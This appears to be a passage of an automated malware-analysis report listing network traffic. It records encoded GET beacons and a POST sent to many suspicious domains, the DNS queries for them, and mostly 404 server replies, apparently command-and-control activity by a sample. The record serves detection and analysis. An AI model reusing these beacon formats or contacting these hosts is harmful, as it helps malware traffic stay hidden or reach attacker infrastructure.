          Source: global trafficHTTP traffic detected: GET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /j8pv/?iS=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /swhs/?iS=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /8gp4/?iS=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.rgenerousrs.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /cpit/?iS=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bpgroup.siteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /a42x/?iS=znfmxVkt4djGk3tmdywtQtJLNg3HiKZ6UNOVA1+QIiGE450155grImBaO89el+v6jlItDAosRwyNbj2dKq66Sb72cNgps88pEUX63gxtlS2fkXN4XLEQUlk=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.remedies.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /fev0/?Bi=zJ_w6yPG&iS=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: babalharra.com.au
          Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
          Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
          Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
          Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
          Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
          Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
          Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
          Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
          Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
          Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
          Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
          Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
          Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
          Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
          Source: global trafficDNS traffic detected: DNS query: www.aballanet.cat
          Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
          Source: global trafficDNS traffic detected: DNS query: google.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: unknownHTTP traffic detected: POST /r3zg/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeHost: www.greenthub.lifeOrigin: http://www.greenthub.lifeReferer: http://www.greenthub.life/r3zg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:55:01 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:55:03 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:55:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:55:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 02:55:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 02:55:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 02:55:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 02:55:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:56:05 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:56:08 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:56:11 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:56:14 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:20 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:23 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:25 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:28 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:49 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:52 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 02:56:55 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Sat, 11 Jan 2025 02:56:57 GMT
          Content-Type: text/html
          Content-Length: 548
          Connection: close
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:57:55 GMT
          Content-Type: text/html; charset=iso-8859-1
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          cf-cache-status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYmiU9Dxu3yTj8B5mHLeSbT2AkWZiQJ4dtoPRBl865L33twk4SHBuhtzsMBWiH8CaKcATtNz3s3keh%2FasViOvT3ALRIPhXbkq1PWYxdOqRPLdiHYxwdcamOfV3nkZyp5SZltlyAemvk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 9001a46209a61158-ORD
          Content-Encoding: gzip
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=118571&min_rtt=118571&rtt_var=59285&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:57:58 GMT
          Content-Type: text/html; charset=iso-8859-1
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          cf-cache-status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uh%2FLeOLc6e8Q3Q%2BS%2B7dEpqZgh8UFls5DGNy7twG04FsspAG7uHdyHarxgfOKS%2FftPBp2T%2FP6yzZyvFfc%2BUNEt6XlM1%2BofxJzPEcD%2BRFfAizSb%2BuZuk9D0E3ET70F1hP%2BWBtkp4K%2BKKA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 9001a472a8a122db-ORD
          Content-Encoding: gzip
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=119763&min_rtt=119763&rtt_var=59881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:58:01 GMT
          Content-Type: text/html; charset=iso-8859-1
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          cf-cache-status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yqNhHrpSWpeskuJROlau%2BAGbyKdKjoeqGANb2o9L8LJMJF1zujC%2BtgNt3nEzTUpe7TLHagzbAL2UjoP%2F%2BpjJWSae6TTI0On7sAOLHErAvOz0aDNM%2Fynqh7gdjoDrcR6rtYnrBYi24Y%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 9001a4833d5a1141-ORD
          Content-Encoding: gzip
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=118462&min_rtt=118462&rtt_var=59231&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:58:03 GMT
          Content-Type: text/html; charset=iso-8859-1
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          cf-cache-status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqgDnMzs9OnlAHmrb5WCA5mWLsp71xH3PAJfA3hPgJIWSHsd%2FVwfvpOjeXvD0SlUJ%2FT7VS%2FHi93dfWlav%2BFfjMLqM%2B9PPF5UzWrIMymJ3neMCo4p9cGS9MqnFnlvIpNEUl%2B5K6zLDsA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 9001a493d9ef6176-ORD
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=118481&min_rtt=118481&rtt_var=59240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
          pragma: no-cache
          content-type: text/html
          content-length: 1251
          date: Sat, 11 Jan 2025 02:58:09 GMT
          server: LiteSpeed
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
          pragma: no-cache
          content-type: text/html
          content-length: 1251
          date: Sat, 11 Jan 2025 02:58:12 GMT
          server: LiteSpeed
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
          pragma: no-cache
          content-type: text/html
          content-length: 1251
          date: Sat, 11 Jan 2025 02:58:15 GMT
          server: LiteSpeed
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
          pragma: no-cache
          content-type: text/html
          content-length: 1251
          date: Sat, 11 Jan 2025 02:58:17 GMT
          server: LiteSpeed
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:58:23 GMT
          Server: Apache
          Expires: Wed, 11 Jan 1984 05:00:00 GMT
          Cache-Control: no-cache, must-revalidate, max-age=0
          Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:58:26 GMT
          Server: Apache
          Expires: Wed, 11 Jan 1984 05:00:00 GMT
          Cache-Control: no-cache, must-revalidate, max-age=0
          Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Sat, 11 Jan 2025 02:58:28 GMT
          Server: Apache
          Expires: Wed, 11 Jan 1984 05:00:00 GMT
          Cache-Control: no-cache, must-revalidate, max-age=0
          Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
          pragma: no-cache
          content-type: text/html
          content-length: 1251
          date: Sat, 11 Jan 2025 02:59:00 GMT
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:59:22 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:59:25 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:59:28 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 02:59:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 02:59:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 03:00:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
